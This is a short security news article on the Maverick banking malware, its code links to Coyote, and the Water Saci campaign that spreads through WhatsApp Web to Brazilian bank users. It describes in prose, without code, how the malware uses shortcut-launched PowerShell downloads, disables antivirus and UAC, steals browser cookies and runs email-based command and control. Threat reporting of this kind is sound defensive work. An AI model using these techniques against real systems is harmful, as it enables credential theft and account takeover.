Threat hunters have uncovered similarities between Coyote banking malware and a newly disclosed malicious program called Maverick. Both strains are written in .NET, target Brazilian users and banks, and share identical functionality to decrypt banking URLs and monitor banking applications. More importantly, both include the ability to spread through WhatsApp Web.
The Maverick Attack Chain
Maverick was first documented by Trend Micro, who attributed it to the threat actor Water Saci. The campaign uses two components. A self propagating malware, SORVEPOTEL, spreads via the desktop web version of WhatsApp and delivers a ZIP archive containing the Maverick payload.
Maverick monitors active browser tabs for URLs matching a hard coded list of Latin American financial institutions. If a match occurs, it contacts a remote server to gather system information and serve phishing pages to steal credentials.
Code Links and Evolution
Cybersecurity firm Sophos first raised the possibility that this activity was related to prior Coyote campaigns. Subsequent analysis from Kaspersky and CyberProof confirmed that Maverick shares many code overlaps with Coyote.
CyberProof's findings show the ZIP file contains a Windows shortcut (LNK) that executes PowerShell. This script connects to an external server to download the first stage payload. Intermediate tools are deployed to disable Microsoft Defender Antivirus and UAC, and then retrieve a .NET loader. This loader features anti analysis techniques and only installs Maverick if the victim is confirmed to be in Brazil by checking time zone and language settings. CyberProof also found evidence of the malware targeting Brazilian hotels, suggesting an expansion of victims.
Water Saci's New Tactics
Trend Micro detailed a newer Water Saci attack chain that relies on an email based command and control (C2) infrastructure and uses multi vector persistence. This new chain avoids .NET binaries, favoring Visual Basic Script and PowerShell to hijack WhatsApp browser sessions.
The malware uses downloaded tools like ChromeDriver to automate the browser and bypass authentication. It steals the victim’s legitimate Chrome profile data, including cookies and authentication tokens, to gain immediate access to the WhatsApp account without triggering security alerts.
This new SORVEPOTEL variant uses IMAP connections to a specific email provider for C2 commands, instead of traditional HTTP communication. It executes a wide array of commands, including running shell commands, taking screenshots, exfiltrating files, and deleting traces of its activity.
The widespread nature of the campaign is driven by WhatsApp's popularity in Brazil, which has over 148 million active users. Trend Micro concluded that the ongoing tactical evolution and region focused targeting indicate that Water Saci is likely linked to Coyote, signaling a significant shift to exploiting messaging platforms for scalable attacks.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
